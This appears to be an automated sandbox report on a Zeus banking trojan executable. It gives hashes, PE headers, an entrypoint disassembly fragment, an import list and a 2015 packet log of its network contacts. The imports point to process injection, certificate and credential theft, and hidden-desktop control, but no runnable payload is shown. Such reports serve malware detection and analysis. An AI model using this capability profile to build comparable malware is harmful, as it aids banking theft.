validation.sls.microsoft.com	65.52.98.231	unknown	true	unknown	unknown
wer.microsoft.com	157.56.141.114	unknown	true	unknown	unknown
watson.microsoft.com	65.55.252.71	unknown	true	unknown	unknown
fiu-eu.org	78.47.223.171	unknown	true	unknown	unknown
go.microsoft.com	134.170.184.137	unknown	true	unknown	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	Pingable	Open Ports
65.52.98.231	United States	unknown	unknown
23.43.139.27	United States	unknown	unknown
224.0.0.252	Reserved	unknown	unknown
8.8.8.8	United States	unknown	unknown
80.239.247.17	European Union	unknown	unknown
78.47.223.171	Germany	unknown	unknown
80.239.149.10	European Union	unknown	unknown
157.56.141.114	United States	unknown	unknown
93.158.110.250	Sweden	unknown	unknown
134.170.184.137	United States	unknown	unknown
23.2.52.54	United States	unknown	unknown
65.55.252.71	United States	unknown	unknown

Static File Info

General
File type:	MS-DOS executable
TrID:	Win32 Executable (generic) (4510/7) 42.48% DOS Executable Borland Pascal 7.0x (2037/25) 19.19% Generic Win/DOS Executable (2004/3) 18.88% DOS Executable Generic (2002/1) 18.86% VXD Driver (31/22) 0.29%
File name:	Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe
File size:	141824
MD5:	4d08934bd040ed25dfa46542e396cb05
SHA1:	848a4e54ea0b6e6cee8a2a31ff77034f7145b048
SHA256:	082a527e31cc1a969e3c41a5e1d1f6d817a742cb5783e9d7c87993a0924073b4
SHA512:	a7f4083ea402c6572f6179ccc997fec2201a827e95f2f2b126942e91ac4b7939f7811f186d77714c8fd4fa6ccc1938156719454e579a2d03c773c0e025512a4c

File Icon

Static PE Info

General
Entrypoint:	0x413048
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x52B23975 [Thu Dec 19 00:10:29 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push 00000000h
xor bl, bl
call 00007F71FC2A2B91h
test al, al
je 00007F71FC2A3BFAh
push 00008007h
mov byte ptr [ebp-10h], bl
mov byte ptr [ebp-0Ch], 00000001h
mov byte ptr [ebp-01h], bl
call dword ptr [004011E4h]
lea eax, dword ptr [ebp-08h]
push eax
call dword ptr [004011E8h]
push eax
call dword ptr [004012CCh]
test eax, eax
je 00007F71FC2A3BA7h
xor edx, edx
cmp dword ptr [ebp-08h], edx
jle 00007F71FC2A3B61h
mov ecx, dword ptr [eax+edx*4]
test ecx, ecx
je 00007F71FC2A3B54h
cmp word ptr [ecx], 002Dh
jne 00007F71FC2A3B4Eh
movzx ecx, word ptr [ecx+02h]
cmp ecx, 66h
je 00007F71FC2A3B41h
cmp ecx, 69h
je 00007F71FC2A3B38h
cmp ecx, 6Eh
je 00007F71FC2A3B2Dh
cmp ecx, 76h
jne 00007F71FC2A3B36h
mov byte ptr [ebp-01h], 00000001h
jmp 00007F71FC2A3B30h
mov byte ptr [ebp-0Ch], 00000000h
jmp 00007F71FC2A3B2Ah
mov bl, 01h
jmp 00007F71FC2A3B26h
mov byte ptr [ebp-10h], 00000001h
inc edx
cmp edx, dword ptr [ebp-08h]
jl 00007F71FC2A3AE3h
push eax
call dword ptr [00401238h]
test bl, bl
je 00007F71FC2A3B29h
call 00007F71FC2A3549h
jmp 00007F71FC2A3B56h
cmp byte ptr [ebp-01h], 00000000h
je 00007F71FC2A3B45h
call 00007F71FC29EB2Fh
call 00007F71FC296625h
test byte ptr [00422BF8h], 00000004h
mov bl, al
je 00007F71FC2A3B3Dh
push 00000000h
mov eax, 00422868h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f7a4	0x118	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25000	0x11ac	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x5a0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Xored PE	ZLIB Complexity	File Type	Characteristics
.text	0x1000	0x20684	0x20800	6.69685920515	False	0.640414663462	data	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x22000	0x2050	0x400	1.61257943446	False	0.208984375	data	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x25000	0x167c	0x1800	5.65098729976	False	0.629557291667	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	GetEnvironmentVariableW, FileTimeToDosDateTime, GetTempFileNameW, HeapReAlloc, FindFirstFileW, SetEndOfFile, CreateProcessW, HeapAlloc, SystemTimeToFileTime, SetFilePointerEx, HeapFree, CreateDirectoryW, GetProcessHeap, IsBadReadPtr, SetFileTime, VirtualQueryEx, WriteFile, Thread32First, WideCharToMultiByte, ReadProcessMemory, HeapDestroy, HeapCreate, Thread32Next, ReadFile, GetTimeZoneInformation, GetFileAttributesExW, CreateToolhelp32Snapshot, FlushFileBuffers, GetTempPathW, GetFileSizeEx, OpenMutexW, GetLastError, VirtualAlloc, VirtualProtectEx, VirtualAllocEx, FindClose, RemoveDirectoryW, FindNextFileW, VirtualProtect, GetFileTime, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, SetFileAttributesW, GlobalLock, GlobalUnlock, GetThreadContext, SetThreadContext, GetProcessId, WTSGetActiveConsoleSessionId, GetModuleHandleW, ReleaseMutex, Process32NextW, Process32FirstW, OpenProcess, CreateRemoteThread, WriteProcessMemory, GetCurrentProcessId, DuplicateHandle, OpenEventW, VirtualFreeEx, GetCurrentThreadId, SetLastError, VirtualFree, GetComputerNameW, SetErrorMode, GetCommandLineW, ExitProcess, CreateThread, GetSystemTime, GetLocalTime, LoadLibraryA, TlsFree, TlsAlloc, CreateFileMappingW, UnmapViewOfFile, MapViewOfFile, MultiByteToWideChar, CreateMutexW, ExpandEnvironmentStringsW, GetProcAddress, GetPrivateProfileIntW, LoadLibraryW, GetPrivateProfileStringW, FreeLibrary, lstrcmpiA, LocalFree, GetVersionExW, GetNativeSystemInfo, GetUserDefaultUILanguage, lstrcmpiW, GetModuleFileNameW, GetFileAttributesW, Sleep, GetTickCount, MoveFileExW, ResetEvent, SetThreadPriority, TerminateProcess, TlsSetValue, GetCurrentThread, SetEvent, TlsGetValue, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, CloseHandle, WaitForMultipleObjects, CreateEventW, CreateFileW, WaitForSingleObject
USER32.dll	EndMenu, GetShellWindow, GetSystemMetrics, RegisterClassExA, DefDlgProcW, DefFrameProcA, OpenInputDesktop, TranslateMessage, RegisterClassExW, GetClipboardData, DefWindowProcA, DefMDIChildProcW, SwitchDesktop, DefDlgProcA, DefMDIChildProcA, RegisterClassW, CallWindowProcA, GetUserObjectInformationW, DefFrameProcW, RegisterClassA, GetMessageA, GetWindowRect, SetCapture, GetParent, GetClassLongW, ExitWindowsEx, SetCursorPos, GetWindowLongW, GetAncestor, PeekMessageW, PeekMessageA, CreateDesktopW, SetProcessWindowStation, DispatchMessageW, CloseWindowStation, CreateWindowStationW, GetProcessWindowStation, CloseDesktop, SetThreadDesktop, OpenWindowStationW, CharLowerW, GetKeyboardState, ToUnicode, MapVirtualKeyW, GetTopWindow, LoadImageW, MsgWaitForMultipleObjects, WindowFromPoint, CharToOemW, CharLowerA, CharUpperW, SetWindowLongW, DrawIcon, GetIconInfo, GetMenuItemCount, RegisterWindowMessageW, GetWindow, CallWindowProcW, GetThreadDesktop, HiliteMenuItem, SetKeyboardState, GetSubMenu, IsRectEmpty, DefWindowProcW, OpenDesktopW, MenuItemFromPoint, GetMenu, GetMenuItemRect, SetWindowPos, GetCursorPos, SendMessageTimeoutW, IsWindow, ReleaseCapture, MapWindowPoints, GetMessagePos, GetWindowThreadProcessId, CharLowerBuffA, EndPaint, GetUpdateRgn, GetMessageW, GetWindowDC, FillRect, PostMessageW, GetWindowInfo, DrawEdge, BeginPaint, TrackPopupMenuEx, SystemParametersInfoW, GetClassNameW, GetMenuState, GetCapture, SendMessageW, PrintWindow, EqualRect, PostThreadMessageW, ReleaseDC, GetDCEx, IntersectRect, GetDC, GetUpdateRect, GetMenuItemID
ADVAPI32.dll	ConvertSidToStringSidW, RegOpenKeyExW, RegEnumKeyExW, RegCloseKey, InitiateSystemShutdownExW, IsWellKnownSid, GetLengthSid, CryptGetHashParam, OpenProcessToken, GetSidSubAuthority, CryptAcquireContextW, OpenThreadToken, GetSidSubAuthorityCount, GetTokenInformation, RegCreateKeyExW, CryptReleaseContext, RegQueryValueExW, CreateProcessAsUserW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetNamedSecurityInfoW, LookupPrivilegeValueW, CryptCreateHash, ConvertStringSecurityDescriptorToSecurityDescriptorW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, RegSetValueExW, CryptHashData, EqualSid
SHLWAPI.dll	StrStrIW, PathRenameExtensionW, StrCmpNIW, wvnsprintfA, StrCmpNIA, PathMatchSpecW, PathUnquoteSpacesW, PathAddExtensionW, PathCombineW, SHDeleteKeyW, PathSkipRootW, SHDeleteValueW, PathAddBackslashW, PathFindFileNameW, PathIsDirectoryW, wvnsprintfW, UrlUnescapeA, PathRemoveBackslashW, PathIsURLW, PathQuoteSpacesW, StrStrIA, PathRemoveFileSpecW
SHELL32.dll	ShellExecuteW, SHGetFolderPathW, CommandLineToArgvW
Secur32.dll	GetUserNameExW
ole32.dll	StringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
GDI32.dll	GetDeviceCaps, CreateCompatibleBitmap, CreateDIBSection, SetViewportOrgEx, DeleteDC, GdiFlush, DeleteObject, SelectObject, SetRectRgn, CreateCompatibleDC, GetDIBits, RestoreDC, SaveDC
WS2_32.dll	WSASend, freeaddrinfo, getaddrinfo, WSAIoctl, WSAAddressToStringW, WSAEventSelect
CRYPT32.dll	CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertCloseStore, CertOpenSystemStoreW, CertDeleteCertificateFromStore, PFXImportCertStore, CryptUnprotectData, PFXExportCertStoreEx
WININET.dll	HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, InternetQueryOptionA, InternetSetOptionA, InternetQueryOptionW, InternetOpenA, HttpAddRequestHeadersA, HttpOpenRequestA, InternetCrackUrlA, InternetConnectA, HttpSendRequestA, HttpSendRequestW, InternetReadFile, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpQueryInfoA, HttpSendRequestExA, InternetCloseHandle
OLEAUT32.dll
NETAPI32.dll	NetApiBufferFree, NetUserEnum, NetUserGetInfo

Network Behavior

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 5, 2015 14:55:12.964571953 CET	54262	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:13.102699995 CET	53	54262	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:13.123143911 CET	64859	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:13.123236895 CET	53	64859	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:13.123701096 CET	49188	80	192.168.2.151	65.55.252.71
Feb 5, 2015 14:55:13.123727083 CET	80	49188	65.55.252.71	192.168.2.151
Feb 5, 2015 14:55:13.123806953 CET	49188	80	192.168.2.151	65.55.252.71
Feb 5, 2015 14:55:13.123955011 CET	49188	80	192.168.2.151	65.55.252.71
Feb 5, 2015 14:55:13.123969078 CET	80	49188	65.55.252.71	192.168.2.151
Feb 5, 2015 14:55:13.605523109 CET	80	49188	65.55.252.71	192.168.2.151
Feb 5, 2015 14:55:13.882472038 CET	49188	80	192.168.2.151	65.55.252.71
Feb 5, 2015 14:55:14.190958023 CET	50036	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:55:14.190963030 CET	50036	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:55:14.288986921 CET	50036	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:55:14.288990974 CET	50036	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:55:19.940532923 CET	54387	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:20.082818985 CET	53	54387	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:20.085113049 CET	63011	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:20.085186005 CET	53	63011	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:20.085663080 CET	49189	443	192.168.2.151	157.56.141.114
Feb 5, 2015 14:55:20.085689068 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:20.085850000 CET	49189	443	192.168.2.151	157.56.141.114
Feb 5, 2015 14:55:20.087016106 CET	49189	443	192.168.2.151	157.56.141.114
Feb 5, 2015 14:55:20.087035894 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:20.651732922 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:20.698291063 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:20.698307037 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:20.764261961 CET	49189	443	192.168.2.151	157.56.141.114
Feb 5, 2015 14:55:20.764282942 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:20.765862942 CET	49189	443	192.168.2.151	157.56.141.114
Feb 5, 2015 14:55:20.765892029 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:21.006974936 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:21.290558100 CET	49189	443	192.168.2.151	157.56.141.114
Feb 5, 2015 14:55:36.699021101 CET	63760	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:36.812969923 CET	53	63760	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:36.975482941 CET	57104	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:36.975572109 CET	53	57104	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:36.975960970 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:36.975986004 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:36.976046085 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:36.976176023 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:36.976187944 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.119700909 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.120810986 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.120831966 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.120934010 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.120949984 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.121473074 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.121493101 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.121552944 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.121570110 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.136929989 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.136950970 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.137001038 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.137016058 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.137027979 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.137207985 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.137211084 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.137227058 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.137271881 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.137623072 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.137634039 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.137640953 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.137718916 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.137917042 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.137928009 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.137934923 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.138021946 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.138362885 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.138389111 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.138397932 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.138446093 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.138458014 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.153579950 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.153599977 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.153665066 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.153677940 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.153723955 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.153762102 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.153773069 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.154066086 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.154077053 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.154129028 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.154140949 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.154505014 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.154515982 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.154586077 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.154597044 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.154758930 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.154768944 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.154833078 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.154843092 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.155162096 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.155173063 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.155241013 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.155251980 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.155322075 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.155383110 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.155392885 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.164141893 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.164155960 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.167644024 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.167736053 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.167751074 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.178174973 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.178193092 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.178272009 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.178284883 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.398431063 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:37.398458958 CET	80	49190	93.158.110.250	192.168.2.151
Feb 5, 2015 14:55:37.602509975 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:38.861774921 CET	49189	443	192.168.2.151	157.56.141.114
Feb 5, 2015 14:55:38.861804008 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:38.863418102 CET	49189	443	192.168.2.151	157.56.141.114
Feb 5, 2015 14:55:38.863432884 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:39.335752964 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:39.357944012 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:39.358040094 CET	49189	443	192.168.2.151	157.56.141.114
Feb 5, 2015 14:55:39.358058929 CET	443	49189	157.56.141.114	192.168.2.151
Feb 5, 2015 14:55:39.602073908 CET	49189	443	192.168.2.151	157.56.141.114
Feb 5, 2015 14:55:51.217617989 CET	49189	443	192.168.2.151	157.56.141.114
Feb 5, 2015 14:55:51.217839003 CET	49188	80	192.168.2.151	65.55.252.71
Feb 5, 2015 14:55:51.218091965 CET	49190	80	192.168.2.151	93.158.110.250
Feb 5, 2015 14:55:59.378469944 CET	51014	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:59.551525116 CET	53	51014	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:59.758740902 CET	61851	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:55:59.758869886 CET	53	61851	8.8.8.8	192.168.2.151
Feb 5, 2015 14:55:59.759288073 CET	49191	80	192.168.2.151	80.239.247.17
Feb 5, 2015 14:55:59.759315968 CET	80	49191	80.239.247.17	192.168.2.151
Feb 5, 2015 14:55:59.759383917 CET	49191	80	192.168.2.151	80.239.247.17
Feb 5, 2015 14:55:59.759532928 CET	49191	80	192.168.2.151	80.239.247.17
Feb 5, 2015 14:55:59.759545088 CET	80	49191	80.239.247.17	192.168.2.151
Feb 5, 2015 14:55:59.969969988 CET	80	49191	80.239.247.17	192.168.2.151
Feb 5, 2015 14:56:00.198478937 CET	49191	80	192.168.2.151	80.239.247.17
Feb 5, 2015 14:56:00.198529005 CET	80	49191	80.239.247.17	192.168.2.151
Feb 5, 2015 14:56:00.398469925 CET	49191	80	192.168.2.151	80.239.247.17
Feb 5, 2015 14:56:09.146416903 CET	49191	80	192.168.2.151	80.239.247.17
Feb 5, 2015 14:56:09.146446943 CET	80	49191	80.239.247.17	192.168.2.151
Feb 5, 2015 14:56:09.249943972 CET	80	49191	80.239.247.17	192.168.2.151
Feb 5, 2015 14:56:09.494468927 CET	49191	80	192.168.2.151	80.239.247.17
Feb 5, 2015 14:56:09.494509935 CET	80	49191	80.239.247.17	192.168.2.151
Feb 5, 2015 14:56:09.698471069 CET	49191	80	192.168.2.151	80.239.247.17
Feb 5, 2015 14:56:14.066591978 CET	59147	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:56:14.303567886 CET	53	59147	8.8.8.8	192.168.2.151
Feb 5, 2015 14:56:14.437726974 CET	57914	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:56:14.437836885 CET	53	57914	8.8.8.8	192.168.2.151
Feb 5, 2015 14:56:14.438242912 CET	49192	80	192.168.2.151	23.2.52.54
Feb 5, 2015 14:56:14.438271999 CET	80	49192	23.2.52.54	192.168.2.151
Feb 5, 2015 14:56:14.438337088 CET	49192	80	192.168.2.151	23.2.52.54
Feb 5, 2015 14:56:14.438479900 CET	49192	80	192.168.2.151	23.2.52.54
Feb 5, 2015 14:56:14.438493967 CET	80	49192	23.2.52.54	192.168.2.151
Feb 5, 2015 14:56:14.664921999 CET	80	49192	23.2.52.54	192.168.2.151
Feb 5, 2015 14:56:14.898452997 CET	49192	80	192.168.2.151	23.2.52.54
Feb 5, 2015 14:56:14.898488998 CET	80	49192	23.2.52.54	192.168.2.151
Feb 5, 2015 14:56:15.101094961 CET	49192	80	192.168.2.151	23.2.52.54
Feb 5, 2015 14:56:20.890158892 CET	64208	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:20.890162945 CET	64208	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:21.039073944 CET	64208	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:21.039077997 CET	64208	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:23.777149916 CET	61431	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:56:23.885358095 CET	53	61431	8.8.8.8	192.168.2.151
Feb 5, 2015 14:56:23.893799067 CET	61124	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:56:23.893893957 CET	53	61124	8.8.8.8	192.168.2.151
Feb 5, 2015 14:56:23.894260883 CET	49193	80	192.168.2.151	134.170.184.137
Feb 5, 2015 14:56:23.894289017 CET	80	49193	134.170.184.137	192.168.2.151
Feb 5, 2015 14:56:23.894350052 CET	49193	80	192.168.2.151	134.170.184.137
Feb 5, 2015 14:56:23.894489050 CET	49193	80	192.168.2.151	134.170.184.137
Feb 5, 2015 14:56:23.894501925 CET	80	49193	134.170.184.137	192.168.2.151
Feb 5, 2015 14:56:24.369798899 CET	80	49193	134.170.184.137	192.168.2.151
Feb 5, 2015 14:56:24.602458000 CET	49193	80	192.168.2.151	134.170.184.137
Feb 5, 2015 14:56:24.602492094 CET	80	49193	134.170.184.137	192.168.2.151
Feb 5, 2015 14:56:24.795311928 CET	56831	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:24.795315981 CET	56831	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:24.898459911 CET	49193	80	192.168.2.151	134.170.184.137
Feb 5, 2015 14:56:24.898730993 CET	56831	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:24.898735046 CET	56831	5355	192.168.2.151	224.0.0.252
Feb 5, 2015 14:56:27.760350943 CET	58211	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:56:27.909050941 CET	53	58211	8.8.8.8	192.168.2.151
Feb 5, 2015 14:56:28.144205093 CET	64824	53	192.168.2.151	8.8.8.8
Feb 5, 2015 14:56:28.144314051 CET	53	64824	8.8.8.8	192.168.2.151
Feb 5, 2015 14:56:28.144680977 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:56:28.144706011 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:56:28.144779921 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:56:28.145667076 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:56:28.145683050 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:56:28.626745939 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:56:28.686671972 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:56:28.686693907 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:56:28.686798096 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:56:28.686820030 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:56:28.760639906 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:56:28.760672092 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:56:29.024473906 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:56:29.054987907 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:56:29.055020094 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:56:29.289133072 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:56:29.494451046 CET	49194	443	192.168.2.151	65.52.98.231
Feb 5, 2015 14:56:29.494486094 CET	443	49194	65.52.98.231	192.168.2.151
Feb 5, 2015 14:56:29.695612907 CET	49194	443	192.168.2.151	65.52.98.231
